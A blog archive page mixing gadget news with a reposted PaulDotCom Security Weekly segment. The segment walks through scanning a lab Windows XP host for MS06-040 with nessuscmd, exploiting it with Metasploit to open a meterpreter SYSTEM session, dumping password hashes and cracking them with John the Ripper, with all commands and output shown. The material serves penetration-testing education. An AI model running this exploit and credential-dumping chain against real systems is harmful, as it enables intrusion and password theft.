Category Archives: Diary Entry

BeBook e-book reader makes its debut, doesn’t run BeOS

Filed under:

If you can get past the tinge of disappointment in learning that something named the BeBook isn’t actually the BeOS-based laptop you’ve been waiting for all these years, you may be only slightly less disappointed to know that it’s another fairly ordinary and somewhat overpriced e-book reader. Coming in at a hefty €330 (or $510), this one ditches newfangled features like built-in WiFi or EV-DO, with it choosing instead to focus on basic features like a six-inch E Ink display, 512MB of internal memory, and an SD card slot for expansion. You’ll also get support for all the usual document and image formats, as well as some basic MP3 playback functionality. If that somehow sounds like the e-book reader you’ve been waiting for, you can order one now and get free worldwide shipping.

[Via Gadget Lab]

Read | Permalink | Email this | Comments

Vita Audio adds a splash of luxury to R4 iPod / DAB radio

Filed under: ,

Nothing says sexy like a sleek wood trim, wouldn’t you wholeheartedly agree? Vita Audio obviously does, as it’s £499.99 ($980) R4 integrated music system just screams lavish. The all-in-one unit packs an iPod dock, slot-loading CD / MP3 / WMA-music disc player, USB port, DAB and FM tuner with RDS, front and rear auxiliary ports, built-in display, alarm clock function and the firm’s detachable RotoDial remote. For those not feeling the rich walnut veneer, there’s also a high-gloss white (surprised?) version available for £50 ($97) more. Sadly, the “coming soon” tidbit leaves us clueless as to how long you actually have left to save up for either of the pricey systems.

[Via ShinyShiny]

Read | Permalink | Email this | Comments

Tech Segment: Probe, Exploit, and Crack for Free – Pauldotcom.com

Episode106 – PaulDotCom Security Weekly

Tech Segment: Probe, Exploit, and Crack for Free

On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show 🙂 I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139

It reports:

Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1

– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:

/framework-3.1/trunk gordon$ ./msfconsole

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ msf v3.2-release
+ — –=[ 286 exploits – 124 payloads
+ — –=[ 17 encoders – 6 nops
=[ 62 aux

I want to tell metasploit to use the following module:

msf > use windows/smb/ms06_040_netapi

I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:

msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:

msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139

Here are what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.10.139 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options:

Name Current Setting Required Description
—- ————— ——– ———–
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port

Exploit target:

Id Name
— —-
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:

msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:

msf exploit(ms06_040_netapi) > sessions -i 1

I then tell meterpreter to load the Sam Juicer module:

meterpreter > use -m Sam

Then I issue the “hashdump” command:

meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into my other directory with John The Ripper Installed:

paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:

paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!

Microsoft device helps police pluck evidence from cyberscene

Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.

“This is cool but also sucks”

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June.

read more | digg story